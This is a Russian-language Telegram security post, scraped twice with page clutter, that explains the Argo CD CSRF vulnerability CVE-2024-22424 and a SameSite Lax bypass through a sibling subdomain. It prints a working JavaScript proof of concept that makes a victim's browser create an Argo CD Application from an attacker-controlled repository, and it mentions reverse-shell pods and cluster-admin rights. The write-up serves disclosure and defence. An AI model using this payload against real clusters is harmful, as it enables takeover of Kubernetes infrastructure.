Notice: file_put_contents(): Write of 19428 bytes failed with errno=28 No space left on device in /var/www/tgoop/post.php on line 50
k8s (in)security@k8security P.1157
K8SECURITY Telegram 1157
2024-ый год для Argo CD начался с пачки CVE (большинство из них DoS), однако наше внимание привлекла CVE-2024-22424: Cross-Site Request Forgery (CSRF) in github.com/argoproj/argo-cd.

Всё началось с того, что уже несколько лет API Argo CD уязвимо к CSRF (1,2). Но разработчики игнорировали эту проблему (видимо не было достоверных пруфов эксплуатации) и в качестве мер митигации стали использовать Lax SameSite cookie, которую можно довольно легко обойти, если origin находится в том же родительском домене, что и target.

Исследователи обнаружившие эту уязвимость рассмотрели случай, когда атакующий контроллирует содержимое на marketing.victim.com (например, через хранимую XSS) и его целью является Argo CD расположенный на argocd.internal.victim.com. Представленный PoC позволяет атакующему через CSRF уязвимость получить полный контроль над кластером Kubernetes. Для этого на подконтрольном домене атакующему достаточно разместить следующий JavaScript код:


var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://argocd.internal.victim.com/api/v1/applications');
xhr.setRequestHeader('Content-Type', 'text/plain')
xhr.withCredentials = true;
xhr.send('{"apiVersion":"argoproj.io/v1alpha1","kind":"Application","metadata":{"name":"test-app1"},"spec":{"destination":{"name":"","namespace":"default","server":"https://kubernetes.default.svc"},"source":{"path":"argotest1","repoURL":"https://github.com/user/repo","targetRevision":"HEAD"},"sources":[],"project":"default","syncPolicy":{"automated":{"prune":false,"selfHeal":false}}}}')


После того как жертва перейдет на marketing.victim.com от её лица выполнится POST запрос к API Argo CD на создание Application, где repoURLgithub репозиторий, в котором злоумышленник может разместить что угодно: Bad Pods с reverse shell, Cluster Admin права и т.д. Всё это задеплоится в кластере.

Более подробно об этой уязвимости можно прочитать в заметке исследователей.

Прикольно, что через веб уязвимость можно получить полный контроль над кластером Kubernetes.
🔥24😱9👍63🥰2



tgoop.com/k8security/1157
Create:
Last Update:

2024-ый год для Argo CD начался с пачки CVE (большинство из них DoS), однако наше внимание привлекла CVE-2024-22424: Cross-Site Request Forgery (CSRF) in github.com/argoproj/argo-cd.

Всё началось с того, что уже несколько лет API Argo CD уязвимо к CSRF (1,2). Но разработчики игнорировали эту проблему (видимо не было достоверных пруфов эксплуатации) и в качестве мер митигации стали использовать Lax SameSite cookie, которую можно довольно легко обойти, если origin находится в том же родительском домене, что и target.

Исследователи обнаружившие эту уязвимость рассмотрели случай, когда атакующий контроллирует содержимое на marketing.victim.com (например, через хранимую XSS) и его целью является Argo CD расположенный на argocd.internal.victim.com. Представленный PoC позволяет атакующему через CSRF уязвимость получить полный контроль над кластером Kubernetes. Для этого на подконтрольном домене атакующему достаточно разместить следующий JavaScript код:


var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://argocd.internal.victim.com/api/v1/applications');
xhr.setRequestHeader('Content-Type', 'text/plain')
xhr.withCredentials = true;
xhr.send('{"apiVersion":"argoproj.io/v1alpha1","kind":"Application","metadata":{"name":"test-app1"},"spec":{"destination":{"name":"","namespace":"default","server":"https://kubernetes.default.svc"},"source":{"path":"argotest1","repoURL":"https://github.com/user/repo","targetRevision":"HEAD"},"sources":[],"project":"default","syncPolicy":{"automated":{"prune":false,"selfHeal":false}}}}')


После того как жертва перейдет на marketing.victim.com от её лица выполнится POST запрос к API Argo CD на создание Application, где repoURLgithub репозиторий, в котором злоумышленник может разместить что угодно: Bad Pods с reverse shell, Cluster Admin права и т.д. Всё это задеплоится в кластере.

Более подробно об этой уязвимости можно прочитать в заметке исследователей.

Прикольно, что через веб уязвимость можно получить полный контроль над кластером Kubernetes.

BY k8s (in)security


Share with your friend now:
tgoop.com/k8security/1157

View MORE
Open in Telegram


Telegram News

Date: |

The SUCK Channel on Telegram, with a message saying some content has been removed by the police. Photo: Telegram screenshot. Over 33,000 people sent out over 1,000 doxxing messages in the group. Although the administrators tried to delete all of the messages, the posting speed was far too much for them to keep up. Matt Hussey, editorial director of NEAR Protocol (and former editor-in-chief of Decrypt) responded to the news of the Telegram group with “#meIRL.” While some crypto traders move toward screaming as a coping mechanism, many mental health experts have argued that “scream therapy” is pseudoscience. Scientific research or no, it obviously feels good. 3How to create a Telegram channel?
from us


Telegram k8s (in)security
FROM American